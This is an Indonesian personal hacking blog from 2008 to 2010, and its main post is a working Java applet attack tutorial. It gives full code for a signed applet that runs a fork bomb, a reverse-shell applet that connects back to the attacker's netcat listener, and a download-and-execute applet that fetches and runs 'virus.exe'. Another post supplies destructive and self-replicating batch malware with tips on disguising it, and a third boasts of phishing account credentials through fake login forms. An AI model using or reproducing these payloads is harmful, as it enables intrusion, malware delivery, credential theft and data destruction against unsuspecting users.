Reza Elborneo Journey

JAVA APPLET ATTACK

2010-11-27T01:44:00.000+07:00

Assalamualaikum..
Sebelumnya mohon maaf klo newbie lancang buka thread baru..
cuma sekedar ingin berbagi

Tentunya teman2 sudah tidak asing dengan tampilan seperti ini, seperti saat mengaksess situs-situs game online java, File Manager Webmin, Foto Uploader Facebook, dll.

Yap,, itu adalah tampilan security warning saat pengecekan signature dari aplikasi java applet dari sumber yang tidak terpercaya. Bagi pengguna awam tentunya tidak akan peduli dengan peringatan2 seperti ini dan dengan lugu dan yakin akan mengklik "Run" agar aplikasi bisa berjalan. Bagaimana jika aplikasi applet nya merupakan aplikasi berbahaya? Nah.. berdasarkan keluguan user inilah kesempatan kita melakukan JAVA APPLET ATTACK.

Lebih jelas tentang apa itu Java Applet http://id.wikipedia.org/wiki/Java_applet

Oke.. cukup intro nya, sekarang saatnya merakit senjata. Kita akan mulai dari senjata "Iseng-iseng" sampe "Serius" .

Bahan-bahan yang dibutuhkan:

Java Development Kit
-Download : http://www.oracle.com/technetwork/java/javase/downloads/index.html
-Install : http://pentaho.phi-integration.com/instalasi-java/instalasi-java-windows
Web Hosting ( http://justfuckinggoogleit.com )

Yang di butuhkan disisi calon korban :

Java Runtime Environment
-Download : http://www.java.com/en/download/inc/windows_upgrade_xpi.jsp

---------------------------------------------------------------------------------------------

Step Pembuatan Key

Sebelumnya kita buat dulu signature key palsu menggunakan keytool, key yang kita buat ini akan kita gunakan untuk membuat applet attack nantinya.
Masuk ke cmd ato terminal ketik :

keytool -genkey -keyalg rsa -alias namaaliasbebas

Selanjutnya lanjutkan mengisi data-data yang ditentukan. Ingat selalu "namaaliasbebas", alias ini akan tetap kita gunakan nanti.

Untuk sementara lewati dulu step-step COMPILE, JAR dan JARSIGNER dibawah ini biar gak bingung:

Step COMPILE

Command :

Javac namafile.java

Dari hasil compile akan terbentuk sebuah file namafile.class

Step JAR

Command :

Jar cvf namafile.jar namafile.class

Output berupa file namafile.jar, yaitu file binary java yang sudah tercompres.

Step JARSIGNER
Command :

Jarsigner namafile.jar namaaliasbebas

"namaaliasbebas" adalah nama alias pada Step Pembuatan Key sebelumnya. Jika lupa alias ini ketik "keytool –list". Jarsigner ini akan menambah signature key pada file namafile.jar yang kita buat pada Step JAR.

---------------------------------------------------------------------------------------------

JAVA APPLET ATTACK IN ACTION

*ISENG* Wind0zz User

Kita akan membuat user kewalahan dengan diam-diam membuat batch file yg bakalan bikin heboh dan panik dan lebay dan alay dan jijay dan.. di komputer korban dan menjalankannya, tapi gak ngerusak loh.

import java.applet.Applet;
import java.io.IOException;

/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
/**
*
* @author Reza Elborneo
*/

public class neo extends Applet {

    public void init() {
        String win = getParameter("cmd");
        String os = System.getProperty("os.name").toLowerCase();
        if (os.indexOf("win") >= 0) {
            try {
                Process p = Runtime.getRuntime().exec(win);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
}

Simpan file diatas dengan nama file neo.java. Lalu ikutkan langkah2 mulai dari Step COMPILE sampe Step JARSIGNER diatas. Perhatikan, sesuaikan "namafile" dengan yang telah ditentukan.

Tahap selanjutnya membuat file html yang berisi applet neo.jar.

<html>
<head>
<title>Welcome</title>
</head>
<body>
<br>
<div>
<applet width='100%' height='500' code='neo.class' archive='neo.jar'>
<param name='cmd' value='cmd.exe /c echo start C:neo.bat > C:neo.bat & echo exit >> C:neo.bat & start C:neo.bat'>
</applet>
</div>
</body>
</html>

Simpan dengan nama apaajah.html, lalu upload ke hostingan beserta file neo.jar dan neo.class dalam satu direktori hosting.
Selanjutnya saatya rayuan maut mu ke korban untuk browsing ke http://situshosting.nya/apaajah.html dan mengklik "Run".
Simple.. file ini akan membuat file neo.bat di C:\ yang berisi
Start C:\neo.bat
exit
Dan menjalankannya. Coba aja di "Run", ato jalankan file C:\neo.bat.. xixixi.. Lihat value dari parameter "cmd" di file html diatas. Silahkan bereeksplorasi.

/me gak bisa ambil screenCruut krn gak bakalan bisa ngapa2in klo file neo.bat dijalankan kecuali komputer di restart.. :capek::dead:

*REVERSE BACK CONNECT*
Aw..aw..aw.. udah mulai makin seru, kita akan melakukan back konek ke komputer korban untuk mendapatkan shell ato cmd korban. Efektif buat satu jaringan local, bisa aja sih buat jaringan lebih luas kaya internet yang penting kita punya IP Public dan koneksi yang wuzzzz tentunya..

import java.applet.Applet;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.Socket;
import java.net.UnknownHostException;
import java.util.logging.Level;
import java.util.logging.Logger;

/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
/**
*
* @author Reza Elborneo
*/
public class KonakBalik extends Applet {

    @Override
    public void init() {
        try {
            Socket socket = new Socket(getParameter("host"), Integer.parseInt(getParameter("port")));
            BufferedReader reader = new BufferedReader(new InputStreamReader(socket.getInputStream()));
            BufferedWriter writer = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
            while (socket.isConnected()) {
                writer.write("Neo@Victim $ ");
                writer.flush();
                String line = reader.readLine();
                if (line == null) {
                    continue;
                } else if (line.equals("exit")) {
                    reader.close();
                    writer.close();
                    socket.close();
                    System.exit(1);
                } else {
                    Process p = Runtime.getRuntime().exec("cmd /c " + line);
                    // Kalo korbannya linux ganti "cmd /c" dengan "/bin/bash"
                    BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
                    String out = null;
                    while ((out = in.readLine()) != null) {
                        writer.write(out);
                        writer.newLine();
                        writer.flush();
                    }
                }
            }
        } catch (UnknownHostException ex) {
            Logger.getLogger(KonakBalik.class.getName()).log(Level.SEVERE, null, ex);
        } catch (IOException ex) {
            Logger.getLogger(KonakBalik.class.getName()).log(Level.SEVERE, null, ex);
        }
    }
}

Simpan file diatas dengan nama KonakBalik.java. Sama seperti sebelumnya, ikutkan langkah2 mulai dari Step COMPILE same Step JARSIGNER diatas.

Dan dibawah ini adalah file html nya yang akan menampung applet back konak.

<html>
<head>
<title>Welcome</title>
</head>
<body>
<br>
<div>
<applet width='100%' height='500' code='KonakBalik.class' archive='KonakBalik.jar'>
<param name='host' value='IP_ADDRESS'>
<param name='port' value='PORT'>
</applet>
</div>
</body>
</html>

Edit "IP_ADDRESS" dengan IP komputer kita saat ini, Edit "PORT" terserah. Simpan dengan ekstensi .html lalu upload bersama file KonakBalik.jar dan KonakBalik.class

Sebelum melancarkan aksi ini, jalankan dulu netcat di komputer kita dengan modus listening.

nc –lvp PORTNYA

Lancarkan aksi seperti sebelumnya dan saat korban masuk perangkap.. BINGGO!!
[*Sory gambar nya gak ke load*]
Interactive Command Prompt si korban kita dapatkan.. selanjutnya terserah mau diapain,, untuk mengakhiri sesi koneksi ketik "exit".

*DOWNLOAD AND EXECUTE*
Nah,, yg ini udah serius, applet yang akan kita buat akan mendownload file yg kita tentukan dan menjalankannya di computer korban. Bisa virus, BotNet, RAT, Keylogger, iStealer, dll.. saran ane file yg akan di download ukurannya jangan yang gede2.

import java.applet.Applet;
import java.io.BufferedOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
import java.net.URLConnection;
import java.util.logging.Level;
import java.util.logging.Logger;

/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
/**
*
* @author Reza Elborneo
*/
public class download extends Applet {

    public download() {
    }

    @Override
    public void init() {
        {
            OutputStream out = null;
            try {
                String fileName = "virus.exe"; // nama file setelah di download
                String path = "D:"; // Lokasi penyimpanan file yg akan di download
                String link = getParameter("url");
                URL url = new URL(link);
                out = new BufferedOutputStream(new FileOutputStream(path + fileName));
                URLConnection con = url.openConnection();
                InputStream in = con.getInputStream();
                byte[] buffer = new byte[in.available()];
                int read;
                while ((read = in.read(buffer)) != -1) {
                    out.write(buffer, 0, read);
                }
                out.flush();
                in.close();
                out.close();
            } catch (IOException ex) {
                Logger.getLogger(download.class.getName()).log(Level.SEVERE, null, ex);
            } finally {
                try {
                    out.close();
                } catch (IOException ex) {
                    Logger.getLogger(download.class.getName()).log(Level.SEVERE, null, ex);
                }
            }
        }
        String os = System.getProperty("os.name").toLowerCase();
        if (os.indexOf("win") >= 0) {
            try {
                Process com = Runtime.getRuntime().exec(getParameter("cmd"));
            } catch (IOException e) {
            }
        }
    }
}

Nama file "download.java", dan seperti biasa lakukan Step COMPILE > Step JAR > Step JARSIGNER. Hasilnya akan membentuk file download.jar, dan download.class yang siap kita upload nanti.

Dan ini file htmlnya..

<html>
<head>
<title>Welcome</title>
</head>
<body>
<br>
<div>
<applet width='100%' height='500' code='download.class' archive='download.jar'>
<param name='url' value='http://situshosting.nya/virus.exe'>
<param name='cmd' value='cmd.exe /c start D:virus.exe'>
</applet>
</div>
</body>
</html>

Sesuaikan value dari parameter "url" berisi dimana virus di hosting, sesuaikan value dari parameter "cmd" sesuai di file "download.java".
Lalu Upload ke hosting bersama file download.jar dan download.class dalam satu direktori.

Outro:
Huff.. panjang juga yah :capek:,, Alasan knp ane bikin panjang2 sampe 3 contoh gini karena ane mau nunjukin klo JAVA APPLET ATTACK bisa dikembangkan jauh lebih bervariasi, bisa aja dijadikan cookie stealer, remote keylogger, DDOS attack dll..dll.. Hanya menurut pemikiran ane semata,

/me msh bego Java :malu:, cuma bisa 3 method ini

Nah mudah2an programmer2 java di HN bisa ngembangin lebih jauh dan sharing hasilnya kepada kita2.. :D

Kekurangannya java applet sangat sensi dengan koneksi, klo koneksi lemot agak lama load nya, kadang mesti di refresh baru applet nya ke load.

Mudah2an tutorial "singkat" ini bisa bermanfaat.. klo gak bermanfaat di buang aja :sedih:

Wassalamualaikum wr wb.

Ngeblog lagee..

2010-11-26T23:08:00.001+07:00

2008.. 2009, 2010..

Woww.. ternyata udah 2 tahun blog ane gak pernah di urus sejak postingan terakhir tahun 2008. Emang bukan blogger sejati sih :p, maklum juga sekarang udah sibuk, gak kaya dulu bisa hampir 24 jam online mulu.

Oke deh sekarang ane mo nyoba aktifin lagi ni blog dengan postingan-postingan bermutu, kalo pun gak bermutu ya cukuplah ane isi dengan dokumentasi-dokumentasi ane biar gak lupa.. ;)

Friendster.com 3 Hari Maintenance (hacked or not ??)

2008-11-17T02:06:00.006+07:00

"Woooyy.. fs dah bise dah budaak...".. itulah teriakan girang seorang user maestro net sekaligus temen ane saat mendapati bahwa friendster.com yang sejak 3 hari lalu (14/11) berstatus "Friendster-Scheduled Maintenance-Temporary Maintenance" kini sudah bisa di akses seperti biasa. Tiba-tiba nada sedih terdengar "Alaaamaaaak.. kawanku ngape pade ilang ne..?? (melayu ponti)" dengan raut muka yang seperti baru pergi-pulang haji jalan kaki sepertinya orang tersebut sudah tidak bersemangat lagi menjalani hidup nya...walaaa...

Merasa penasaran ane mencoba login ke fs ane.. (waaaaaks,, punya fs juga toh??) gak..cuma iseng-iseng aja kok.. sumpah iseng.. hmm... gak kok.. fren-fren ane msh adem ayem aja di sana.. tapi beberapa temen juga kehilangan friends nya.. Hmm ya udah lah,, ane pikir peduli amat fs kalian,, yg penting fs ane tetep jadi idola.. hoekss..

TAPI.. waktu malamnya ane coba lagi buka fs ane.. dan ternyata.. hahaha.. friends list ane raib entah kemana.. yg ada hanya pesan manis " You do not have any friends yet. Check out the "Explore" page to see what's happening on Friendster." Sebenernya biasa aja sih pengaruhnya sama ane.. namanya aja cuma iseng-iseng buat tuh fs.. walaupun friends nya udah penuh..huehue.. Tapi karna penasaran ane coba cari-cari info apa yg terjadi dengan friendster.

3 Hari waktu maintenance (13/11 - 16/11),, hmm..perasaan baru kali ini maintenance nya selama itu. Info yang ane dapat friendster telah mengalami ganngguan power di SunnyVale yaitu database center dari friendster yang menyebabkan hilangnya beberapa data, mungkin itu penyebab friends fs pada ilang semua hahaha...

Dan ini beberapa info lainnya..

forum friendstertalk Indonesia:

“Sampai saat ini, friendster masih belum bisa di akses, baik versi desktop maupun versi mobile.
Dan kalaupun bisa diakses, masih banyak error yang terjadi.
Semua itu ga ada hubungannya dengan tweaking yang lu lakuin di friendster lu.

FAQ :
Q: Kenapa friends gw yang ada di fs ilang semua ?
A : “We are aware of this issue and will have it fixed ASAP. Don’t worry; your friends are not lost, they will return. We apologize for this inconvenience.” - friendsterteam

forum friendstertalk general:

“Please be advised that Friendster has suffered a great damage on their site as a computer/programmer named h4xor-nytmare had infiltrated their database. Please, do not log in your accounts or add friends for the mean time for the team is currently recovering the losses that were inflicted.”

http://www.crunchbase.com/company/friendster

from friendsterteam:

“We’re aware of the problem that some users are having with missing friends. We experienced a major power outage the other day, that we’re still recovering from.

We are actively working on resolving the problem with missing friends. Rest assured that no friends have actually been lost — even though it may appear so on the website! The problem should be fixed within the next 24 hours. We apologize for this inconvenience.

Friendster Team”

Beberapa bisik-bisik tetangga juga mengatakan bahwa friendster.com telah di hack oleh seorang dengan nick h4xor-nytmare, ada juga yg bilang klo sistem bulletin sedang di upgrade jadi ntar bisa masukin html di bulbo.. gak nyangka ternyata ane juga jago ngegosip ya.. wkkwkwk.. Tapi iklan-iklan di fs tetep jalan lhooo..

Mungkin para friendster mania (bukan ane..) sekarang sedang berharap-harap cemas,, mudah2an gak terjadi apa2 sama profil nya juga friends list mereka.. dari pihak fs juga sudah berusaha meyakinkan user nya kalo data-data mereka akan kembali seperti semula..

Tapi ane buat fs beneran iseng lhoo.. suwerr deh..

Warning dari Partner in Crime :P

2008-11-03T21:01:00.004+07:00

Ehem.. setelah sekian lama maen rampok2 an account malu-ah baru kali ini dapat warning dari partner in crime ane, yaitu situs sensor-dulu-ahhh.com. Pasalnya ane make service situs ntu buat dapetin user ma pass malu-ah org (lagi-lagi ?? oh no..), buat iseng2 aja neh cuy..

Situs sensor-dulu-ahhh.com ini menawarkan layanan mail form generator, jadi kita bisa buat form dengan hasil html, form2 ini biasa digunakan buat website misal form contact me, setiap ada input yang masuk hasilnya akan masuk ke email kita, sesuai akun yg kita buat di situs sensor-dulu-ahh.com. Disitu lah kelebihan layanan ini, input nya langsung masuk email. Layanan itu ane pake buat bikin fake login situs malu-ah. Sebagai umpan ane make profil cewek cakep.. hahaha..

Hari berganti hari, bulan berganti bulan, bahkan tahun berganti tahun.. account2 pun terus masuk ke email tanpa henti-hentinya.. lumayan buat iseng2 ngerjain malu-ah nya temen2. Hingga pada suatu hari,,

JEGGERRRR..

Sett dah,, udah sekian lama ini baru ketahuan,,hihihi.. di anggap melakukan phishing (emang iya sih..). Padahal cuma malu-ah, segitunya amat tuh admin. Ane di anggap melanggar ToS.. emang gak pernah ane baca tuh ToS..wkwkwk..

Sebenarnya bisa aja sih buat form sendiri make php dengan fungsi mail(), tapi kalo ada yang lebih gampang ngapain harus repot (padahal emang gak bisa :P)

Ya udah.. mumpung trik fake login ini msh lumayan berhasil dilancarkan ane buat lagi deh akun baru di situs sensor-dulu-ahh.com nanti kalo di suspend lagi ya buat lagi,, mumpung gratisan.. hohoho..

Kalo sampe di suspend lagi,, hmmm.. berarti adminnya situs sensor-dulu-ahh.com ini rajin malu-ah an.. :P

Minal 'Aidin Wal-Faizin

2008-09-30T00:10:00.003+07:00

Bagai sebuah "SYSTEM" yang dipenuhi "BUG", diri ini dapat dengan mudah di "EXPLOIT"-tasi.
Jaga hati, ucapan, dan sikap dengan "FIREWALL" keimanan.
"SCAN" dan "REMOVE" semua "VIRUS" dan "BACKDOR" yang masih tersisa.
"END PROCESS" pikiran kotor yang masih ada.
"TAR -ZXVF" semua keluh kesah hanya pada-Nya semata.
"SAVE MODE" dalam sikap dan perkataan.
"GOOGLE", temukan jati diri sesungguhnya.
Hari kemenangan tlah tiba, saatnya kita ber-"YAHOO!" ria.

MINAL 'AIDIN WAL-FAIZIN
MOHON MAAF LAHIR DAN BATIN

Re : Surat Cinta Seorang Hacker

2008-09-28T00:38:00.004+07:00

Pernah ngeliat surat cinta seorang hacker yang ini ??

Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdor “Remote Connect-Back Shell”jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada macelinious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, …?

Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain …kamu.

Sumber : http://echo.or.id/forum/viewtopic.php?p=43382

Kasian sang hacker,, akhirnya setelah sekian lama sang hacker pun mendapatkan jawaban surat cinta nya,,

Maaf, aku tak pernah menggunakan port default. Dan aku slalu menggunakan protocol2 yang secure.
sehingga tak kan pernah kau mendapatkan plain text saat kau mencoba melakukan sniffing terhadapku
dan C:\nc -l -o -v -e yang kau berikan hanya kuanggap sebagai spam semata
Meskipun kau menggunakan anonymous proxy, kan terus ku trace, hingga ku temukan IP asli mu sebagai seorang pecundang yang tak bisa di andalkan

Maaf, bug-bug vulnerabilitasku yang kau temukan hanyalah sebuah honeypot untuk menjebak pecundang sepertimu.
Antivirus ku telah mendetect dan meRemove mu sebagai sebuah trojan yang mengancam
Meskipun kau berhasil memasang backdor php shell di hatiku tapi maaf,.. server tomcat ku hanya support jsp. :P
Freespace yang ada hanya tinggal sebuah drive swap yang sangat penting artinya bagiku, dan takkan kuijinkan siapapun menempatinya.
Meskipun kau berhasil menambatkan Netcat sebagai "Remote Connect-Back Shell", percuma,.. proxy bokap ku takkan pernah mengijinkan ku terkoneksi dg orang lain.

Maaf, untuk saat ini kau hanya akan menerima "Request timed out" dariku.
Karena hatiku sedang "Sory, server maintenance"
Tak perlu kau menjaga ku, karna bokapku telah menjodohkanku dengan seorang PNS (bukan Pegawai Negeri Sipil tapi Professional Network Security)

Maaf, untuk saat ini "Destination unreachable"
Untukmu tak prnah ada kata "You dont have permission to access it"
Suatu saat kau akan menerima "Reply from me" dengan TTL=never. Tapi hanya sebatas sahabat, jangan mengharap respon lebih dariku.
karena adminku bisa-bisa curigation dan memblok akses dengan alasan klasik RUU APP.

Kau benar, aku bukanlah sebuah system, dan aku bukanlah bidadarimu.
dan aku bukanlah Ryan Si penjagal dari jombang yang bisa kau ajak berhomo ria.

Sumber :
http://coder.web.id/forum/index.php?topic=143.msg18402#msg18402

Cinta yang aneh..

Alamat IP Akan Habis pada 2010

2008-09-26T22:43:00.004+07:00

LONDON - Vinton Gray "Vint" Cerf yang dijuluki sebagai 'ayah-nya internet', mengingatkan para ilmuwan bahwa dunia sudah di ambang kehabisan alamat internet.

Bila hal itu benar terjadi, diramalkan komputer tidak akan bisa lagi saling mengidentifikasi satu sama lain dan saling berkomunikasi.

Cerf yang merupakan ilmuwan terkemuka dari bidang komputer menyatakan, dunia bisnis dan konsumen membutuhkan sesegera mungkin pergantian alamat internet.

Sebagai informasi, setiap komputer dan peranti online didesain dengan masing-masing dipasangkan alamat Internet Protocol (IP) yang unik.

Menurut perkiraan persediaan nomor yang belum teralokasi akan segera habis dalam dua tahun ke depan. Padahal alamat IP merupakan hal yang sangat krusial untuk sebuah situs dan akan berimbas langsung ke dunia bisnis. Bila diandaikan, alamat IP adalah seperti alamat rumah.

Menanggapi kondisi ini, Cerf menegaskan bahwa inilah saatnya untuk mulai bersiap-siap, terutama bagi penyedia layanan internet. Jika tidak, komputer tidak akan bisa dipakai berselancar online lagi dan selanjutnya konektivitas internet akan musnah. Cerf juga menambahkan bahwa tidak akan sempat lagi bila memilih jalan transisi secara pelan-pelan.

"Kondisi ini seperti internet yang akan kehabisan nomor telepon, padahal tanpa nomor telepon baru itu berarti tidak ada lagi pertambahan pelanggan internet," terang Cerf seperti dilansir Big News Network, Jumat (26/9/2008).

Cerf dan para koleganya menemukan sistem internet pada 1977 dan mereka menempatkan Internet Protocol version Four (Ipv4) dengan kapasitas 4,2 miliar alamat. Masing-masing IPv4 berseri 32 digit angka biner.

Menganut estimasi ketersediaan alamat IPv4 yang tersisa tinggal 14 persen, diprediksikan alamat tersebut akan habis di tahun 2010, dan mungkin juga akan lebih cepat di tahun depan, mengingat berkembangnya teknologi yang berkemampuan online, terutama ponsel mobile.

Untuk menenangkan suasana, beberapa ilmuwan mengklaim sudah mengembangkan sistem baru bertitel IPv6 yang dijanjikan sudah siap digunakan untuk sepuluh tahun ke depan. Tiap IPv6 mengandung 128 bit dan bisa menyediakan bertriliun-triliun alamat yang diyakini bisa memenuhi kebutuhan manusia generasi mendatang terhadap internet.

Kedua sistem protokol tersebut akan berjalan bersamaan dengan jaminan alamat berbasis IPv4 masih bisa digunakan. Namun bila IPv6 tidak diaplikasikan secara luas, maka mereka yang menggunakan IPv6 tidak bisa tersambung ke internet secara keseluruhan.

Krisis alamat protokol internet ini ditanggapi serius pula oleh The Organisation for Economic Co-operation and Development. Organisasi ini mewanta wanti pergantian pola alamat internet yang bisa jadi merupakan masa depan kritis bagi perekonomian internet karena bidang bisnis apapun pasti membutuhkan alamat IP untuk perkembangan bisnis yang bersangkutan. (jri)

Sumber

KYAAAAAAA...!!!! ternyata sudah secepat itu

Buat para admin jaringan persiapkan otak anda buat ngitung IPv6 yang 128 Bit,, hueheue...

Dari iseng sampai serius dengan file *.bat

2008-09-10T01:07:00.004+07:00

Buat yang lagi bosan, suka iseng, resek, jail, dan kurang kerjaan mungkin ngerjain teman bisa menjadi alternatif untuk mengisi waktu anda yang membosankan itu (dasar sampah !!). Mari iseng2 dulu dengan file *.bat ini,, yuuk marii,,

@echo off
A:
Echo Do you want to delete all your computer's data? (y/n)
pause
Echo Are you sure want to delete all data? (y/n)
pause
Echo Deleting all data...
pause
dir /s
pause Echo Hahaha,, kennaaak deeeh..
pause
goto A

Copy code ke notepad, simpan file trsebut dengan nama .bat kirim ke teman anda ato simpan di start up kompi nya,, lebih elit lagi klo dibinder ama file-file yg menarik. Jika file ini diklik maka akan menampilkan pesan untuk konfirmasi penghapusan semua data, tapi sebenarnya enggak cuma discan aja koq,,

Berikutnya coba yang satu ini

@echo off
start planx

Simpan dengan nama planx.bat. Haha,, yang ini lebih parah lagi temen anda pasti bakal kelabakan, dua baris code diatas akan menampilkan box prompt secara terus menerus sampe akhirnya box yg paling akhir keluar di close. Coba aja sendiri,, heheh.. gpp kok

Bosen dengan main-main mulu? mari mulai serius. Simpan code dibawah ini dengan nama .bat

@echo off
del c:\\windows\system32\shutdown.exe
del c:\\windows\system32\winlogon.exe
del c:\\windows\system32\rundll32.exe

Ihh.. yang ini serem banget, liat aja tuh. Shutdown.exe, winlogon.exe rundll32.exe di apus bersih, crash deh komputer nya,,

Nah,, yang satu ini gak kalah berbahayanya nih,,

@echo off
color4
title PLX
start
start
start
start calc
copy %0 %systemroot%\Picture2.bat > null
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Picture2 /t REG_SZ /d %systemroot%\Picture2.bat /f > null
copy %0 *.bat > null
Attrib +r +h Picture2.bat
Attrib +r +h
RUNDLL32USER32.DLL,SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%desktop
copy Picture2.bat PLX.bat
copy Picture2.bat PLX.jpg
copy Picture2.bat PLX.txt
copy Picture2.bat PLX.exe
copy Picture2.bat RIP.mov
copy Picture2.bat FixVirus.bat
cd %userprofile%\My Documents
copy Picture2.bat PLX1.bat
copy Picture2.bat PLX.jpg
copy Picture2.bat PLX txt
copy Picture2.bat PLX.exe
copy Picture2.bat PLX.mov
copy Picture2.bat FixVirus1.bat
start
start calc
cls
msg*PLX
msg*PLX
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:PLX
cd %userprofile%\desktop
copy Picture2.bat %random%.bat
cd %userprofile%\My Documents
copy Picture2.bat %random%.bat
goto PLX

Simpan code diatas dari notepad dengan nama Picture2.bat. File ini akan membuka windows, mengcopy dirinya di start up dengan 2 metode, menjadikan dirinya bertipe "hidden", mengganti tombol mouse kiri dengan kanan, begitu juga sebaliknya, mematikan limeware, msn, norton, mencopy dirinya di desktop dan documents, membuka alert box dan dan akhirnya merestart komputer anda. Kalo pengen nyobain jangan ragu-ragu untuk mengklik nya,, dan rasakan faedah nya,, heuheuehue,,,

Agar tampak lebih meyakinkan compile menjadi file exe lalu bind dengan file menarik lainnya ato dengan cara lain memanfaatkan SFX winrar (mungkin lain kali akan dibahas, udah malem besok masuk pagi,, arrrr). Wahh,, tanduk setan anda sudah keluar tuh,, keliatannya pengen banget ngerjain temen ato mungkin balas dendam ama musuh... hanya berpesan seperti kata nenek saya "ingat jangan merusak komputer orang,, iseng boleeh,,..."

Sumber : planxton.wordpress.com

Google Blokir Ziddu.com ??

2008-09-09T21:03:00.004+07:00

8 Sepetember 08, pukul 2.30 dini hari

Cukup kaget ketika mengarahkan link menuju ziddu.com muncul warning dari google dengan screenshot seperti ini

: google warning for ziddu.com

Google menganggap ziddu.com sebagai situs yang berusaha menginstal program jahat ke komputer pengunjung. Berikut statement yang dikeluarkan google atas situs ini

What is the current listing status for www.ziddu.com/?

Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 216 pages we tested on the site over the past 90 days, 54 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 09/07/2008, and the last time suspicious content was found on this site was on 09/07/2008.

Malicious software is hosted on 1 domain(s), including adxcnet.net.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including adecn.com, adrefer.net.

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, www.ziddu.com/ did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

Namun peringatan ini hanya terjadi pada client google, seperti pengguna browser mozilla, pada browser lain seperti IE, situs tersebut tidak mengeluarkan warning apapun..

Ziddu.com merupakan situs file hosting yang cukup digemari hoster, situs ini menerapkan pemberian fee kepada membernya bagi setiap file yang didownload melalui situsnya. Yang menarik situs ini tidak meminta biaya sedikit pun bagi calon member yang ingin bergabung, Upload - Share - Earn Money 100% FREE!!

So,, bagaimana nasib para penanam saham di ziddu ?? ternyata beberapa membernya murka,, lihat pernyataan membernya yang satu ini

So,How about My Earning????(............???)
How about My Files?????(...........????)
Would you(ziddu.com) was responsible with that( my files n my earning$$$$$)

sumber

Untung gak ada file-file penting saya di situ,, hehe.. Yang penting selalu siaga aja, rajin-rajin aja deh patch anti-virus, n firewall dengan update-an terbaru.

sumber : planxton.wordpress.com

Kembali Ke Warnett..!!

2008-09-06T23:06:00.003+07:00

Haaaa,, senang rasanya akhirnya ane kembali kerja di warnet maestro kesayangan. Ane berhenti kerja di warnet karena dulu ane ikut daftar beasiswa D3 TKJ. Ane karena ane ntar kuliah nya nih pasti bakal ketat banget, ngabisin waktu seharian, apalagi kampus nya terkenal dengan disiplinnya yang kuat. Tapi setelah dijalani,, huuuuuuuuu.. santai banget dah kuliahnya sumpah, uang gajian juga tetap jalan tiap bulan.. hehe,, beruntung banget ya ??.

Terdengar bisik-bisik tetangga kalo op yang sekarang bakal berenti juga karena dapat beasiswa kuliah di Jakarta,, ahaa.. langsung aja ane menghadap bos besar yang punya warnet ane sedikit merayu dengan tampang lugu ane pun kembali bekerja di warnet itu. Banyak kenangan di warnet ini. Dari warnet inilah ane benar mendapat banyak pelajaran berharga tentang komputer dan internet.

Kayanya hari-hari ane di depan komputer mulu nih,,, ahhh,, bisa-bisa makin rabun ni mata.. :D

Blogging Lageee :P

2008-09-03T22:37:00.003+07:00

Setelah sekian lama menghilang dari dunia per “blog-an” akhirnya ane memutuskan untuk kembali menghidupkan blog ini. Beberapa bulan terakhir ini ane sibuk banget (yaahh,, alasan klasik) ane mencoba menjajaki diri di dunia bisnis internet, hasilnya lumayan deh ada juga buat nambah-nambahin uang jajan dan rokok walaupun sebenarnya dalam menjalaninya kemaren ada unsur curang-curang dikit lah.. hehe..

